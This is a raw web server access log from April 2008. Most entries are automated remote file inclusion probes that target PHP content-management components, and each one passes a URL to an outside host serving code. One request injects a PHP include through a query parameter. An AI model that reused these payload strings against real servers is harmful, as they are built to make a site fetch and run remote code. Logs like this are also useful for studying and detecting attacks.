210.17.16.67 - - [17/Apr/2008:11:34:08 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.5.124.107 - - [17/Apr/2008:11:34:09 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.5.124.107 - - [17/Apr/2008:11:34:09 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.5.124.107 - - [17/Apr/2008:11:34:09 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.5.124.107 - - [17/Apr/2008:11:34:10 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.5.124.107 - - [17/Apr/2008:11:34:10 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.5.124.107 - - [17/Apr/2008:11:34:13 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.5.124.107 - - [17/Apr/2008:11:34:13 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.108.82 - - [17/Apr/2008:11:34:31 -0700] "GET /logs/access_071129.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.108.82 - - [17/Apr/2008:11:34:31 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.108.82 - - [17/Apr/2008:11:34:32 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.241.32.144 - - [17/Apr/2008:11:35:00 -0700] "GET /logs/access_071129.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.144 - - [17/Apr/2008:11:35:00 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.144 - - [17/Apr/2008:11:35:00 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
69.9.129.6 - - [17/Apr/2008:11:37:51 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://www.lalefm.eu/phpform/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.129.6 - - [17/Apr/2008:11:37:51 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.lalefm.eu/phpform/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.129.6 - - [17/Apr/2008:11:37:51 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.lalefm.eu/phpform/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.129.6 - - [17/Apr/2008:11:38:18 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.lalefm.eu/phpform/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:11:39:02 -0700] "GET /logs/index.php?place=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:11:39:04 -0700] "GET /index.php?place=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:11:40:16 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:11:40:16 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:11:40:20 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "dmulk.com"
87.106.68.149 - - [17/Apr/2008:11:40:20 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "dmulk.com"
202.133.60.199 - - [17/Apr/2008:11:40:35 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://zodila.ilive.ro/sistem.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.17.16.67 - - [17/Apr/2008:11:40:47 -0700] "GET /logs/access_080127.log//includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.17.16.67 - - [17/Apr/2008:11:40:49 -0700] "GET //includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.17.16.67 - - [17/Apr/2008:11:40:50 -0700] "GET /logs//includes/db_adodb.php?baseDir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.195.114.88 - - [17/Apr/2008:11:41:40 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "dmulk.com"
217.195.114.88 - - [17/Apr/2008:11:41:40 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "dmulk.com"
217.195.114.88 - - [17/Apr/2008:11:41:57 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
217.195.114.88 - - [17/Apr/2008:11:41:57 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
202.125.44.70 - - [17/Apr/2008:11:42:29 -0700] "GET /logs//components/minibb/index.php?absolute_path=http://alltojesus.org/bbs/include/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
202.125.44.70 - - [17/Apr/2008:11:42:29 -0700] "GET //components/minibb/index.php?absolute_path=http://alltojesus.org/bbs/include/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
217.195.114.88 - - [17/Apr/2008:11:42:52 -0700] "GET /logs//phpAdsNew/view.inc.php?phpAds_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
217.195.114.88 - - [17/Apr/2008:11:42:52 -0700] "GET //phpAdsNew/view.inc.php?phpAds_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
207.44.147.66 - - [17/Apr/2008:11:44:18 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.z3roadster.it/home/css.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
207.44.147.66 - - [17/Apr/2008:11:44:20 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.z3roadster.it/home/css.txt? HTTP/1.1" 200 4139 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
217.195.114.88 - - [17/Apr/2008:11:44:50 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
217.195.114.88 - - [17/Apr/2008:11:44:51 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
80.67.24.32 - - [17/Apr/2008:11:46:10 -0700] "GET /logs/access_080215.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.32 - - [17/Apr/2008:11:46:10 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.32 - - [17/Apr/2008:11:46:11 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.117 - - [17/Apr/2008:11:46:29 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
66.249.70.117 - - [17/Apr/2008:11:46:29 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 561818 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
70.86.130.234 - - [17/Apr/2008:11:46:55 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.usa-westen.info/Fotos/save.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.130.234 - - [17/Apr/2008:11:46:55 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.usa-westen.info/Fotos/save.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.130.234 - - [17/Apr/2008:11:46:55 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.usa-westen.info/Fotos/save.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.125.44.70 - - [17/Apr/2008:11:47:37 -0700] "GET /newspublish/samplenewspublish.php?path[docroot]=http://alltojesus.org/bbs/include/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
202.125.44.70 - - [17/Apr/2008:11:47:37 -0700] "GET /logs/newspublish/samplenewspublish.php?path[docroot]=http://alltojesus.org/bbs/include/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
209.97.203.110 - - [17/Apr/2008:11:47:44 -0700] "GET /logs/access_080321.log/index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://www.gomaka.com/uploader/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.97.203.110 - - [17/Apr/2008:11:47:46 -0700] "GET /index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://www.gomaka.com/uploader/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
209.97.203.110 - - [17/Apr/2008:11:47:46 -0700] "GET /logs/index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://www.gomaka.com/uploader/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.155.227.84 - - [17/Apr/2008:11:48:17 -0700] "GET /logs/access.log//display.php?page=&lang=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.155.227.84 - - [17/Apr/2008:11:48:18 -0700] "GET //display.php?page=&lang=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.155.227.84 - - [17/Apr/2008:11:48:19 -0700] "GET /logs//display.php?page=&lang=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.182.191.76 - - [17/Apr/2008:11:48:24 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.articles-free.com/images/icons/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.5.124.107 - - [17/Apr/2008:11:48:25 -0700] "GET /logs/access_080313.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.5.124.107 - - [17/Apr/2008:11:48:28 -0700] "GET /logs/access_080313.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.5.124.107 - - [17/Apr/2008:11:48:28 -0700] "GET /logs/access_080313.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.76 - - [17/Apr/2008:11:48:30 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.articles-free.com/images/icons/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.76 - - [17/Apr/2008:11:48:36 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.articles-free.com/images/icons/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.104.37.122 - - [17/Apr/2008:11:49:38 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.104.37.122 - - [17/Apr/2008:11:49:38 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.104.37.122 - - [17/Apr/2008:11:49:39 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.104.223.2 - - [17/Apr/2008:11:49:42 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.104.223.2 - - [17/Apr/2008:11:49:42 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.104.223.2 - - [17/Apr/2008:11:49:43 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.205.115 - - [17/Apr/2008:11:49:56 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.205.115 - - [17/Apr/2008:11:49:56 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.141.149 - - [17/Apr/2008:11:49:56 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.205.115 - - [17/Apr/2008:11:49:56 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.141.149 - - [17/Apr/2008:11:49:56 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.141.149 - - [17/Apr/2008:11:49:56 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.104.37.122 - - [17/Apr/2008:11:49:58 -0700] "GET /logs/access_080329.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.104.223.2 - - [17/Apr/2008:11:50:00 -0700] "GET /logs/access_080329.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.239.5.15 - - [17/Apr/2008:11:50:13 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.239.5.15 - - [17/Apr/2008:11:50:13 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.239.5.15 - - [17/Apr/2008:11:50:14 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.205.115 - - [17/Apr/2008:11:50:18 -0700] "GET /logs/access_080329.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.141.149 - - [17/Apr/2008:11:50:20 -0700] "GET /logs/access_080329.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.239.5.15 - - [17/Apr/2008:11:50:39 -0700] "GET /logs/access_080329.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.143.173.2 - - [17/Apr/2008:11:50:40 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://au.ex.ac.uk/~sailing/images/stories/jpg.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
202.47.247.136 - - [17/Apr/2008:11:50:48 -0700] "GET //skin/zero_vote/error.php?dir=http://au.ex.ac.uk/~sailing/images/stories/jpg.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
80.67.24.32 - - [17/Apr/2008:11:51:11 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.32 - - [17/Apr/2008:11:51:11 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.32 - - [17/Apr/2008:11:51:11 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.182.191.76 - - [17/Apr/2008:11:51:14 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.articles-free.com/images/icons/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.76 - - [17/Apr/2008:11:51:15 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.articles-free.com/images/icons/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.76 - - [17/Apr/2008:11:51:15 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.articles-free.com/images/icons/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.62.97 - - [17/Apr/2008:11:51:38 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.97 - - [17/Apr/2008:11:51:40 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.97 - - [17/Apr/2008:11:51:41 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.182.191.76 - - [17/Apr/2008:11:51:42 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.articles-free.com/images/icons/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.76 - - [17/Apr/2008:11:51:46 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.articles-free.com/images/icons/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.76 - - [17/Apr/2008:11:51:48 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.articles-free.com/images/icons/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.115 - - [17/Apr/2008:11:51:55 -0700] "GET /logs/access_080201.log HTTP/1.0" 200 859311 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.67.24.32 - - [17/Apr/2008:11:52:06 -0700] "GET /logs/access_080126.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.182.191.76 - - [17/Apr/2008:11:52:17 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.articles-free.com/images/icons/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.76 - - [17/Apr/2008:11:52:26 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.articles-free.com/images/icons/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.76 - - [17/Apr/2008:11:52:26 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.articles-free.com/images/icons/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.76 - - [17/Apr/2008:11:52:27 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.articles-free.com/images/icons/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.76 - - [17/Apr/2008:11:52:28 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.articles-free.com/images/icons/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.76 - - [17/Apr/2008:11:52:36 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.articles-free.com/images/icons/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Apr/2008:11:53:25 -0700] "GET /logs/access.log//com_expose&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
